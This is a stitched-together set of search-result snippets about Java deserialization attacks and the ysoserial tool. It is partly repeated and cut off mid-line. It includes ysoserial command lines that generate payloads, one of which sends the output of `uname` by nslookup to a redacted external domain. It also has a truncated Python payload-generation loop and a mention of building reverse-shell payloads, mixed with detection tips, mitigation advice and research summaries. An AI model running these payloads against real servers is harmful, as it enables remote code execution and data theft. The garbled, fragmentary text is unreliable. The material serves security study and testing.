Payload generators for the following marshallers are included: ... Multiple libraries can be used to handle JSON in Java. ... Jackson is a popular Java library used for working with JSON (JavaScript Object Notation) data. Jackson-databind supports Polymorphic Type Handling (PTH), formerly known as "Polymorphic Deserialization", which is disabled by default.

Payload generators for the following marshallers are included: Multiple libraries can be used to handle JSON in Java. ... Jackson is a popular Java library used for working with JSON (JavaScript Object Notation) data. Jackson-databind supports Polymorphic Type Handling (PTH), formerly known as "Polymorphic Deserialization", which is disabled by default.

A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization. - frohoff/ysoserial

April 25, 2024 - This post describes in-depth how a Java application can take serialized user-controlled input, deserialize it via a method such as `readObject` and get to remote code execution (RCE), using a specific example payload from the ysoserial tool.

February 18, 2025 - import os import re import base64 import urllib payloads = ['BeanShell1', 'Clojure', 'CommonsBeanutils1', 'CommonsCollections1', 'CommonsCollections2', 'CommonsCollections3', 'CommonsCollections4', 'CommonsCollections5', 'CommonsCollections6', 'Groovy1', 'Hibernate1', 'Hibernate2', 'JBossInterceptors1', 'JRMPClient', 'JSON1', 'JavassistWeld1', 'Jdk7u21', 'MozillaRhino1', 'Myfaces1', 'ROME', 'Spring1', 'Spring2'] def generate(name, cmd): for payload in payloads: final = cmd.replace('REPLACE', payload) print 'Generating ' + payload + ' for ' + name + '...' command = os.popen('java -jar ../ysoser

For example: java -jar ysoserial-all.jar \ --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED \ --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED \ --add-opens=java.base/java.net=ALL-UNNAMED \ --add-opens=java.base/java.util=ALL-UNNAMED \ [payload] '[command]'

March 25, 2024 - Projects such as YSoSerial (Java) and YSoSerial .NET (C#) consolidate public research on successful gadget chains for common libraries and make it easy for anyone to generate a payload with one of these chains. This is then encoded and can be passed to servers with deserialization bugs.

If the application knows before deserialization which messages will need to be processed, they could sign them as part of the serialization process. The application could then to choose not to deserialize any message which didn't have an authenticated signature. ... A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.

java -jar ysoserial.jar CommonsCollections1 calc.exe > commonpayload.bin java -jar ysoserial.jar Groovy1 calc.exe > groovypayload.bin java -jar ysoserial-master-v0.0.4-g35bce8f-67.jar Groovy1 'ping 127.0.0.1' > payload.bin java -jar ysoserial.jar Jdk7u21 bash -c 'nslookup `uname`.[redacted]' | gzip | base64

If it does, you can be sure that deserialization occurred on your target. JRMPClient is another universal chain that you can use for initial detection. It causes the server to try establishing a TCP connection to the supplied IP address. Note that you need to provide a raw IP address rather than a hostname. This chain may be useful in environments where all outbound traffic is firewalled, including DNS lookups. You can try generating payloads with two different IP addresses: a local one and a firewalled, external one.

May 22, 2024 - I will walk through the CommonsCollections1 gadget chain from Ysoserial, probably the most well-known tool for Java deserialization attacks. It's best to read this article with some understanding of what Java reflection is. So, I invite you to do a little research into that if you are unfamiliar. It's also important to note that this is a very old payload, so that I will be referring to the code from JDK 1.8.0_60.

August 12, 2024 - The main tool to exploit Java deserializations is ysoserial (download here). You can also consider using ysoseral-modified which will allow you to use complex commands (with pipes for example). Note that this tool is focused on exploiting ObjectInputStream. I would start using the "URLDNS" payload before a RCE payload to test if the injection is possible.

March 25, 2022 - A critical condition for insecure deserialization is that the hacker can force the server to deserialize objects of any type. The hacker can then send payloads with objects instantiated from gadget classes.

javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21

October 30, 2018 - We decided to move forward with another option, which is a reverse shell written in Java. We are going to modify the source code on the Gadgets.java to generate a reverse shell payload.

June 25, 2020 - This was done by modifying the Ysoserial code and building a new Java Archive (JAR). It was then possible to generate valid payloads that would properly be deserialized on the server side.

February 12, 2026 - Serialization (and a reverse process — deserialization) is simply a feature of Java (and many other languages) which allow objects to be converted to a special, binary form, in which they can be transported and stored.

Specifically, it controls how the library includes type information when serializing Java objects into JSON format and how it uses type information when deserializing JSON back into Java objects. With default typing enabled, an attacker can craft malicious JSON payloads that specify arbitrary Java classes for deserialization.

Executing these requests enables to detect if the web server is vulnerable to known attacks. If one of the payloads is executed it means that a vulnerability has been executed and that the web server needs to be patched. Frohoff et al. [22] have implemented the ysoserial tool which provides 34 publicly available Java deserialization payloads.

February 26, 2026 - This paper presents LLM-JDFuzz, the framework that leverages Large Language Models for automated Java deserialization payload generation. By reframing payload generation as a constraint-aware code synthesis problem, LLM-JDFuzz introduces three key innovations: (1) an Autoprompting engine that ...